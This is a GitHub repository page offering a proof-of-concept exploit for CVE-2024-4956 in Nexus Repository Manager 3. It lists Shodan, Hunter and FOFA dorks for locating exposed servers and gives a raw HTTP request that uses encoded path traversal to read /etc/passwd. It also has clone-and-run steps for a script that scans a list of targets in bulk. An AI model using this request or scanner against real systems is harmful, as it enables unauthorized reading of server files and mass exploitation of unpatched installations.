Skip to content

CVE-2024-4956 : Nexus Repository Manager 3 poc exploit

Notifications You must be signed in to change notification settings

GoatSecurity/CVE-2024-4956

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 
 
 

Repository files navigation

# # CVE-2024-4956 : Nexus Repository Manager 3

Dork:

  • Shodan:http.html:"Nexus Repository"

  • Hunter:product.name="Nexus Repository"

  • FOFA:app="Nexus-Repository-Manager"

Poc :

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0

1

Or you can use this python script for multi scan :

!Put your targets in targets.txt

git clone https://github.com/GoatSecurity/CVE-2024-4956.git
cd CVE-2024-4956
pip install -r requirements.txt
python scan.py

Screenshot

About

CVE-2024-4956 : Nexus Repository Manager 3 poc exploit

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages